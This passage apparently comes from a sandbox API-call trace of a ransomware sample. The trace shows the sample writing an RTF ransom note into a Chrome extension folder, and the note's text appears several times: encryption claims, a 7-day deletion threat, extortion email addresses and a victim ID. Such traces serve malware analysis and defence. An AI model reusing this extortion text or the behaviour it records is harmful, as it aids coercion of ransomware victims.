butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.177] WriteFile (in: hFile=0x2e8, lpBuffer=0x1ef8bd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef8bd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.178] CloseHandle (hObject=0x2e8) returned 1 [0292.178] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\#readme_eman#.rtf")) returned 0xffffffff [0292.178] GetLastError () returned 0x2 [0292.178] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.179] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.179] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.179] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef8bd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r 